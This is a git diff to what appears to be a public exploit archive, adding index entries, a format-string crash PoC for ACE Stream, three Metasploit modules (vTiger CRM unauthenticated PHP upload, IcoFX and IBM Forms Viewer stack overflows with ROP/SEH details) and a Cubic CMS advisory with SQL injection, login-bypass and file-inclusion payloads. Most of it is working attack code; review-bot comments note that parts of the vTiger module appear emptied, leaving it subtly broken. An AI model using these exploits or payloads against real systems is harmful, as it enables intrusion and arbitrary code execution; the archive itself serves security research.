diff --git a/files.csv b/files.csv
index a773fb338..2639f8f01 100755
--- a/files.csv
+++ b/files.csv
@@ -27516,6 +27516,7 @@ id,file,description,date,author,platform,type,port
30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.PHP Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0
30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0
30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0
+30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0
30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
@@ -27616,3 +27617,7 @@ id,file,description,date,author,platform,type,port
30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
+30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80
+30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
+30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
+30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80
diff --git a/platforms/multiple/local/30666.txt b/platforms/multiple/local/30666.txt
new file mode 100755
index 000000000..080b2e0bf
--- /dev/null
+++ b/platforms/multiple/local/30666.txt
@@ -0,0 +1,67 @@
+?
+ACE Stream Media 2.1 (acestream://) Format String Exploit PoC
+
+
+Vendor: ACE Stream
+Product web page: http://www.acestream.org
+Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)
+
+Summary: Ace Stream is an innovative multimedia platform of a new
+generation, which includes different products and solutions for
+ordinary Internet users as well as for professional members of the
+multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
+technology, BitTorrent protocol, which is acknowledged as the most
+effective protocol to transfer/deliver 'heavy content'.
+
+Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
+string vulnerability because the application fails to properly
+sanitize user-supplied input thru the URI using the 'acestream://'
+protocol before including it in the format-specifier argument of
+a formatted-printing function. A remote attacker may exploit this
+issue to execute arbitrary code with the privileges of the user
+running the affected application and/or cause memory address disclosure.
+Failed exploit attempts may cause denial-of-service (DoS) conditions.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5165
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
+
+
+30.12.2013
+
+--
+
+
+format md:
+
+acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
+acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
+acestream://AAAA%s
+acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
+acestream://AAAA%08d
+acestream://%i%i%i%i
+acestream://%c%c%c%c
+acestream://%f%f%f%f
+acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
+acestream://%15.10s.%15.10s
+acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
+acestream://%0a%0d
+acestream://%AA
+acestream://%p%p%p%p%s
+
+crashes:
+
+acestream://AAAA%08s
+acestream://AAAA%n
+acestream://%08s
+acestream://%p%p%p%p%s%n
+acestream://%n
+acestream://%s%s%s%s
+acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA
diff --git a/platforms/php/remote/30787.rb b/platforms/php/remote/30787.rb
new file mode 100755
index 000000000..36db8d113
--- /dev/null
+++ b/platforms/php/remote/30787.rb
@@ -0,0 +1,182 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include REXML
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
+ 'Description' => %q{
+ vTiger CRM allows an user to bypass authentication when requesting SOAP services.
+ In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
+ service. By combining both vulnerabilities an attacker can upload and execute PHP
+ code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
+ 10.04 and Windows 2003 SP2.
+ },
+ 'Author' =>
+ [
+ 'Egidio Romano', # Vulnerability discovery
+ 'juan vazquez' # msf module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2013-3214' ],
+ [ 'CVE', '2013-3215' ],
+ [ 'OSVDB', '95902' ],
+ [ 'OSVDB', '95903' ],
+ [ 'BID', '61558' ],
+ [ 'BID', '61559' ],
+ [ 'EDB', '27279' ],
+ [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
+ [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Payload' =>
+ {
+ # Arbitrary big number. The payload is sent base64 encoded
+ # into a POST SOAP request
+ 'Space' => 262144, # 256k
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'vTigerCRM v5.4.0', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Mar 26 2013'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
+ ], self.class)
+ end
+
+ def check
+ test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
+ res = send_soap_request(test_one)
+
+ unless res and res.code == 200 and res.body.to_s =~ //
+ return Exploit::CheckCode::Unknown
+ end
+
+ test_two = check_email_soap("admin")
+ res = send_soap_request(test_two)
+
+ if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /.*<\/return>/)
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ file_name = rand_text_alpha(rand(10)+6) + '.php'
+ php = %Q||
+
+ soap = add_attachment_soap(file_name, php)
+ res = send_soap_request(soap)
+
+ print_status("#{peer} - Uploading payload...")
+ if res and res.code == 200 and res.body.to_s =~ /.*<\/return>/
+ print_good("#{peer} - Upload successfully uploaded")
+ register_files_for_cleanup(file_name)
+ else
+ fail_with(Failure::Unknown, "#{peer} - Upload failed")
+ end
+
+ print_status("#{peer} - Executing payload...")
+ send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
+ end
+
+ def add_attachment_soap(file_name, file_data)
+ xml = Document.new
+ xml.add_element(
+ "soapenv:Envelope",
+ {
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+ 'xmlns:crm' => "http://www.vtiger.com/products/crm"
+ })
+ xml.root.add_element("soapenv:Header")
+ xml.root.add_element("soapenv:Body")
+ body = xml.root.elements[2]
+ body.add_element(
+ "crm:AddEmailAttachment",
+ {
+ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+ })
+ crm = body.elements[1]
+ crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filename", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
+ crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
+ crm.add_element("username", {'xsi:type' => 'xsd:string'})
+ crm.add_element("session", {'xsi:type' => 'xsd:string'})
+ crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
+ crm.elements['filedata'].text = "MSF_PAYLOAD"
+ crm.elements['filename'].text = "MSF_FILENAME"
+ crm.elements['filesize'].text = file_data.length.to_s
+ crm.elements['filetype'].text = "php"
+ crm.elements['username'].text = rand_text_alpha(4+rand(4))
+
+ xml_string = xml.to_s
+ xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
+ xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
+
+ return xml_string
+ end
+
+ def check_email_soap(user_name = "", session = "")
+ xml = Document.new
+ xml.add_element(
+ "soapenv:Envelope",
+ {
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+ 'xmlns:crm' => "http://www.vtiger.com/products/crm"
+ })
+ xml.root.add_element("soapenv:Header")
+ xml.root.add_element("soapenv:Body")
+ body = xml.root.elements[2]
+ body.add_element(
+ "crm:CheckEmailPermission",
+ {
+ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+ })
+ crm = body.elements[1]
+ crm.add_element("username", {'xsi:type' => 'xsd:string'})
+ crm.add_element("session", {'xsi:type' => 'xsd:string'})
+ crm.elements['username'].text = user_name
+ crm.elements['session'].text = session
+
+ xml.to_s
+ end
+
+ def send_soap_request(soap_data)
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap_data
+ })
+
+ return res
+ end
+
+end
\ No newline at end of file
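Review bot: The first probe in `check` tests `res.body.to_s =~ //`, and an empty regex matches every string, so that condition only ever verifies the 200 status; if a fault-detection pattern was intended it appears to have been lost, and the same rendering artefact seems to have emptied the `%Q||` literal at the top of `exploit`, so both should be compared against the upstream module before this listing is relied on. Separately, the success message `print_good("#{peer} - Upload successfully uploaded")` reads oddly; `print_good("#{peer} - Payload successfully uploaded")` says what was meant. Also note that `String#gsub!` with a string replacement interprets `\1`, `\\` and `\&` sequences in the replacement, so the placeholder substitutions at the end of `add_attachment_soap` (and the `generate_xfdl.gsub` call in 30789.rb) are more clearly written in block form, e.g. `xml_string.gsub!(/MSF_PAYLOAD/) { Rex::Text.encode_base64(file_data) }`; harmless here because the replacements are base64/alphanumeric, but the block form documents that a literal is intended.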
diff --git a/platforms/php/webapps/30790.txt b/platforms/php/webapps/30790.txt
new file mode 100755
index 000000000..a3a5e701b
--- /dev/null
+++ b/platforms/php/webapps/30790.txt
@@ -0,0 +1,61 @@
+I. BACKGROUND
+-------------------------
+"CUBIC CMS" is a non-free content management system for websites and
+portals of any size, powerful, adaptable to any graphic design that
+allows users administration 100% professional but simple at the same
+time that website.
+
+II. VULNERABILITIES
+-------------------------
+
+II.i FULL PATH DISCLOSURE
+-------------------------
+CUBIC CMS presents a full path disclosure in the 'Controller Not Found'
+exception management, due to an incorrect 'Software Exception' management.
+
+Syntax:
+ http://www.example.com/id/-22
+ http://www.example.com/foo.bar
+
+II.ii SQL Injection
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters
+on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP
+Method, due to an insufficient sanitization on user supplied data.
+
+Syntax:
+ http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
+ http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
+
+II.iii SQL Injection
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his
+'/login.usuario' (Users Management Module) script via POST HTTP Method, due to an
+insufficient sanitization on user supplied data.
+
+Syntax:
+ login=Administrator&pass=foobar') or ('1'='1
+
+II.iv Local File Inclusion
+-------------------------
+CUBIC CMS presents a SQL Injection in its 'path' parameter on his
+'/recursos/agent.php' (Resources Management Module) script via GET HTTP Method,
+due to an insufficient sanitization on user supplied data.
+
+Syntax:
+ http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini
+
+IV. REFERENCES
+-------------------------
+http://www.proyectosbds.com
+http://www.cubicfactory.com/
+
+V. DISCLOSURE TIMELINE
+-------------------------
+- March 28, 2012: First Vendor Contact.
+- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).
+
+VI. CREDITS
+-------------------------
+This vulnerability has been discovered
+by Eugenio Delfa .
\ No newline at end of file
diff --git a/platforms/windows/local/30788.rb b/platforms/windows/local/30788.rb
new file mode 100755
index 000000000..a11aed383
--- /dev/null
+++ b/platforms/windows/local/30788.rb
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IcoFX Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in version 2.1
+ of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
+ crafted ICONDIR header, providing an arbitrary long number of images into the file,
+ can be used to trigger the overflow when reading the ICONDIRENTRY structures.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Marcos Accossatto', # Vulnerability discovery, poc
+ 'juan vazquez' # Metasploit
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-4988' ],
+ [ 'OSVDB', '100826' ],
+ [ 'BID', '64221' ],
+ [ 'EDB', '30208'],
+ [ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ]
+ ],
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 864,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'IcoFX 2.5 / Windows 7 SP1',
+ {
+ :callback => :target_win7,
+ }
+ ],
+ ],
+ 'DisclosureDate' => 'Dec 10 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico'])
+ ], self.class)
+
+ end
+
+ def target_win7
+ # All the gadgets com from IcoFX2.exe 2.5.0.0
+
+ # ICONDIR structure
+ ico = [0].pack("v") # Reserved. Must always be 0
+ ico << [1].pack("v") # Image type: 1 for icon (.ico) image
+ # 0x66 is enough to overwrite the local variables and, finally
+ # the seh handler. 0x7f00 is used to trigger an exception after
+ # the overflow, while the overwritten SEH handler is in use.
+ ico << [0x7f00].pack("v")
+ # ICONDIRENTRY structures 102 structures are using to overwrite
+ # every structure = 16 bytes
+ # 100 structures are used to reach the local variables
+ ico << rand_text(652)
+ ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
+ ico << [0x0045cc21].pack("V") # jmp esp
+ ico << payload.encoded
+ ico << rand_text(
+ 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
+ 652 - # padding to align the stack pivot
+ 80 - # rop nops size
+ 4 - # jmp esp pointer size
+ payload.encoded.length
+ )
+ # The next ICONDIRENTRY allows to overwrite the interesting local variables
+ # on the stack
+ ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
+ ico << rand_text(8) # Padding
+ ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
+ # The next ICONDIRENTRY allows to overwrite the seh handler
+ ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
+ ico << rand_text(0xc) # padding
+ return ico
+ end
+
+ def exploit
+ unless self.respond_to?(target[:callback])
+ fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined")
+ end
+
+ ico = self.send(target[:callback])
+
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+ file_create(ico)
+ end
+
+end
\ No newline at end of file
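Review bot: The module description says the overflow is in "version 2.1 of IcoFX", while the only target is named `IcoFX 2.5 / Windows 7 SP1` and the gadget comment in `target_win7` says the addresses come from IcoFX2.exe 2.5.0.0; one of these versions is presumably wrong and the description should be reconciled with the target metadata. The comment `# All the gadgets com from IcoFX2.exe 2.5.0.0` also has a typo (`come from`), and `# ICONDIRENTRY structures 102 structures are using to overwrite` is hard to parse; `# 102 ICONDIRENTRY structures (16 bytes each) are used for the overwrite` restates it plainly. `target_win7` has no header comment; a one-line `# Builds the .ico file body for the Windows 7 target; returns a String` would help readers who start from `exploit`'s `send(target[:callback])`.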
diff --git a/platforms/windows/local/30789.rb b/platforms/windows/local/30789.rb
new file mode 100755
index 000000000..c8774c5f7
--- /dev/null
+++ b/platforms/windows/local/30789.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include REXML
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IBM Forms Viewer Unicode Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
+ is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
+ XFDL files, with a long fontname value. This module has been tested successfully on IBM
+ Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability discovery
+ 'juan vazquez', # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-5447' ],
+ [ 'OSVDB', '100732' ],
+ [ 'ZDI', '13-274' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 3000,
+ 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ECX',
+ 'BufferOffset' => 10
+ },
+ 'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
+ 'DisableNops' => true,
+ # Fix the stack before the payload is executed, so we avoid
+ # windows exceptions due to alignment
+ 'Prepend' =>
+ "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+ "\x83\xC0\x08" + # add eax, byte 8
+ "\x8b\x20" + # mov esp, [eax]
+ "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
+ # masqform.exe 8.0.0.266
+ {
+ 'Ret' => 0x4c30, # p/p/r unicode from masqform.exe
+ 'Nop' => 0x47, # 004700 => add [edi+0x0],al
+ 'Offset' => 62
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Dec 05 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']),
+ ], self.class)
+ end
+
+ def generate_xfdl
+ xml = Document.new
+
+ # XFDL
+ xfdl = xml.add_element("XFDL", {
+ 'xmlns:custom' => "http://www.ibm.com/xmlns/prod/XFDL/Custom",
+ 'xmlns:designer' => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6",
+ 'xmlns:ev' => "http://www.w3.org/2001/xml-events",
+ 'xmlns:xfdl' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+ 'xmlns:xforms' => "http://www.w3.org/2002/xforms",
+ 'xmlns' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+ 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+ 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance"
+ })
+
+ # XFDL => globalpage
+ xdfl_global_page = xfdl.add_element("globalpage", {
+ "sid" => "global"
+ })
+ global = xdfl_global_page.add_element("global", {
+ "sid" => "global"
+ })
+ designer_date = global.add_element("designer:date")
+ designer_date.text = "20060615"
+ form_id = global.add_element("formid")
+ form_id.add_element("title")
+ serial_number = form_id.add_element("serialnumber")
+ serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000"
+ version_form = form_id.add_element("version")
+ version_form.text = "1"
+
+ # XFDL => page
+ page = xfdl.add_element("page", {
+ "sid" => "PAGE1"
+ })
+
+ # XFDL => page => global
+ page_global = page.add_element("global", {
+ "sid" => "global"
+ })
+ label_page = page_global.add_element("label")
+ label_page.text = "PAGE1"
+
+ # XFDL => page => label
+ label = page.add_element("label", {
+ "sid" => "title"
+ })
+ item_location = label.add_element("itemlocation")
+ x = item_location.add_element("x")
+ x.text = "20"
+ y = item_location.add_element("y")
+ y.text = "0"
+ value = label.add_element("value", {
+ "compute" => "global.global.custom:formTitle"
+ })
+ value.text = rand_text_alpha(10)
+ font_info = label.add_element("fontinfo")
+ font_name = font_info.add_element("fontname")
+ font_name.text = "MSF_REPLACE"
+ xml.to_s
+ end
+
+
+ def exploit
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
+ sploit << [target.ret].pack("v") # seh # ppr
+ sploit << [target['Nop']].pack("C")
+ sploit << payload.encoded
+ sploit << rand_text_alpha(4096) # make it crash
+
+ xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(xfdl)
+ end
+
+end
\ No newline at end of file
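Review bot: The local `xdfl_global_page` in `generate_xfdl` misspells the XFDL prefix used by every other name in the method; rename it to `xfdl_global_page`. The comment on the NSEH line in `exploit` repeats itself (`# nseh # NSEH # popad ...`); dropping the duplicate label reads better. `generate_xfdl` would also benefit from a one-line header such as `# Builds the XFDL document with a MSF_REPLACE placeholder in the fontname element; returns a String`, since the placeholder contract is otherwise only visible from the caller's `gsub`.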